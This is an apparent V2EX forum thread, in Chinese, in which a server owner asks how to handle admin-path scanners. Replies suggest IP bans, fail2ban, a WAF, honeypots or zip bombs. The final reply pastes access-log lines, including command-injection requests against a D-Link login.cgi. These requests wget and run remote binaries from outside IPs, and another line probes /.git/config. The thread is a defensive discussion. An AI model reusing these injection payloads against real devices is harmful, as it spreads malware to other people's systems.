V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
alvin666
V2EX  ›  问与答

服务器被扫后台怎么办?

  •  
  •   alvin666 · 2019-01-18 19:49:26 +08:00 · 2698 次点击
    这是一个创建于 2127 天前的主题,其中的信息可能已经有所发展或是发生改变。

    Snipaste_2019-01-18_19-43-27.jpg

    一打开 web 日志全是类似的内容,查了下大部分是国内的云服务器。

    感觉现在再加到黑名单里面也没用了。

    所以该怎么办?蜜罐?比如请求 /phpmyadmin 就直接封 ip ?还是哪里有国内云服务器的 ip 列表,全屏蔽了算了。

    11 条回复    2019-01-19 00:50:58 +08:00
    letitbesqzr
        1
    letitbesqzr  
       2019-01-18 21:31:16 +08:00
    不知道楼主在怕啥,怕流量耗完了?
    cpdyj0
        2
    cpdyj0  
       2019-01-18 21:33:10 +08:00
    楼主要是愿意就 ban ip 呗,根据访问频率 ban ip
    glouhao
        3
    glouhao  
       2019-01-18 21:38:50 +08:00 via Android   ❤️ 1
    没流量的网站流量全靠他们了
    boris1993
        4
    boris1993  
       2019-01-18 21:49:21 +08:00 via Android   ❤️ 1
    返回 HTTP 403 没啥问题
    嫌恶心要么脑内过滤,要么上 fail2ban 之类的玩意
    AlisaDestiny
        5
    AlisaDestiny  
       2019-01-18 22:03:03 +08:00   ❤️ 1
    正常现象,就像别人路过你家门口随手推一下门看能不能打开一样。
    做好基本防范就够了。
    s609926202
        6
    s609926202  
       2019-01-18 22:16:42 +08:00 via iPhone
    我也有这个问题
    puritania
        7
    puritania  
       2019-01-18 22:45:25 +08:00 via iPhone
    nginx 装个 waf
    ysc3839
        8
    ysc3839  
       2019-01-18 22:57:16 +08:00 via Android   ❤️ 3
    你网站要是不用 PHP 的话,把所有 PHP 后缀的请求都返回个压缩炸弹。如果是只有一个 index.php 入口的也可以设置成非 index.php 返回。

    压缩炸弹指的是把非常大的空白数据压缩,一般来说可以压缩得很小,解压时会占用很大的内存。
    misaka19000
        9
    misaka19000  
       2019-01-18 22:59:19 +08:00
    可以放个蜜罐?
    whoami9894
        10
    whoami9894  
       2019-01-18 23:35:22 +08:00 via Android
    设置一下把所有 404 的目录返回 200
    1v9
        11
    1v9  
       2019-01-19 00:50:58 +08:00
    巧了,我也有一堆
    ```
    89.248.174.141 - - [17/Jan/2019:21:35:31 +0800] "GET /.git/config HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
    151.95.13.123 - - [17/Jan/2019:22:58:48 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://157.230.29.251/bins/Solar.mips%20-O%20->%20/tmp/.Solar;chmod%20777%20/tmp/.Solar;/tmp/.Solar%20dlink%27$ HTTP/1.1" 400 157 "-" "Solar/2.0"
    209.17.97.114 - - [18/Jan/2019:00:31:55 +0800] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http://cloudsystemnetworks.com)"127.0.0.1 - - [18/Jan/2019:01:12:15 +0800] "GET / HTTP/1.1" 401 179 "-" "-"
    116.9.5.92 - - [18/Jan/2019:02:07:02 +0800] "GET /phpmyadmin HTTP/1.1" 444 0 "http://104.168.142.126/phpmyadmin" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
    79.44.88.130 - - [18/Jan/2019:07:22:29 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.222.202.118/dlink.sh%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 157 "-" "Rift/2.0"
    ```
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   5796 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 34ms · UTC 06:21 · PVG 14:21 · LAX 22:21 · JFK 01:21
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.